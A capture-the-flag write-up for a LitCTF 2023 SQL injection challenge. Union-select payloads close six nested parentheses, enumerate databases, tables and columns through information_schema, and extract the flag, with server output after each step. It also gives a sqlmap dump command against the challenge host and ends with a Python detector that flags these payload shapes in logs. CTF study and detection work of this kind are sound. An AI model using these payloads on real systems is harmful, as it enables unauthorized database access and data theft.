[LitCTF 2023] 这是什么?SQL !注一下 ! (What is this? SQL! Inject it!)

Published 2023-05-26 21:42:37 Author: Ekusas

Solution process

The source code shows the two columns username and password, so we do not need an order by statement to work out the column count.

Querying all databases

The given SQL statement shows that the id is wrapped in six levels of parentheses, (((((())))))), so the payload must close all six before the union:

?id=-1)))))) union select schema_name,2 from information_schema.schemata%23


Array ( [0] => Array ( [username] => information_schema [password] => 2 ) [1] => Array ( [username] => mysql [password] => 2 ) [2] => Array ( [username] => ctftraining [password] => 2 ) [3] => Array ( [username] => performance_schema [password] => 2 ) [4] => Array ( [username] => test [password] => 2 ) [5] => Array ( [username] => ctf [password] => 2 ) )


Querying the ctf database

?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )


?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctf'%23
//users


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctf'%23
// id,username,password


?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1~tanji~OHHHHHHH,2~fake_flag~F1rst_to_Th3_eggggggggg!}
// fake flag

Querying the ctftraining database

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users 


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='flag' and table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag 


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='news' and table_schema='ctftraining'%23
//id,title,content,time


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctftraining'%23
//id,username,password,ip,time


?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema='ctftraining'%23
//0 results


?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema='ctftraining'%23
//0 results


?id=-1)))))) union select flag,2 from flag where table_schema='ctftraining'%23
//0 results


How can the result be empty????
Maybe the statement is the problem; let's just run sqlmap directly:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D "ctftraining" -T flag -C flag --dump
//NSSCTF{4cae7b33-2369-4fc6-8d2f-96703f010fd5}

After testing, it turns out that table_schema is only a column of the built-in information_schema tables, not of ordinary tables like flag; to query a table in a specific database here we should use the db_name.table_name form:
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{4cae7b33-2369-4fc6-8d2f-96703f010fd5}
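From the defender's side, the payload shape used throughout this writeup (six closing parentheses, union select, information_schema lookups, a trailing # comment, and finally the db_name.table_name form) is easy to spot in access logs. The following Python check is an added example and is not part of the original writeup; the request lines are constructed, and /index.php is only a placeholder path.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request lines (placeholder path, not real traffic),
# including the two payload shapes from the writeup above.
SAMPLE_REQUESTS = [
    "GET /index.php?id=1",
    "GET /index.php?id=-1))))))%20union%20select%20schema_name,2%20from%20information_schema.schemata%23",
    "GET /index.php?id=-1))))))%20union%20select%20flag,2%20from%20ctftraining.flag%23",
    "GET /index.php?id=5)",
    "GET /index.php?id=2%20and%20sleep(1)%23",
]

UNION_RE = re.compile(r"\bunion\b[\s/*]+(?:all[\s/*]+)?select\b", re.I)
SCHEMA_RE = re.compile(r"\binformation_schema\.", re.I)
COMMENT_RE = re.compile(r"#|--\s|/\*")
# FROM db.table where db is not information_schema: a cross-database read
QUALIFIED_RE = re.compile(r"\bfrom\s+(?!information_schema\.)\w+\.\w+", re.I)

def analyse_param(value):
    """Return the indicator names found in one URL-decoded parameter value."""
    hits = []
    # More ')' than '(' means the value is closing brackets the query opened,
    # which is exactly the -1)))))) breakout used above.
    if value.count(")") > value.count("("):
        hits.append("paren_breakout")
    if UNION_RE.search(value):
        hits.append("union_select")
    if SCHEMA_RE.search(value):
        hits.append("information_schema")
    if COMMENT_RE.search(value):
        hits.append("trailing_comment")
    if QUALIFIED_RE.search(value):
        hits.append("qualified_table")
    return hits

def scan(requests):
    """Map each suspicious request line to its 'param:indicator' findings."""
    findings = {}
    for line in requests:
        target = line.split(" ", 1)[1]
        # parse_qsl URL-decodes, so %23 becomes '#' and %20 becomes a space
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = analyse_param(value)
            if hits:
                findings.setdefault(line, []).extend(f"{name}:{h}" for h in hits)
    return findings

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(line, "->", ", ".join(hits))
```

A single indicator such as one stray ")" is weak on its own; in practice alert on combinations like paren_breakout together with union_select or information_schema.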

This referenced the writeup by clqwsn on the NSSCTF platform.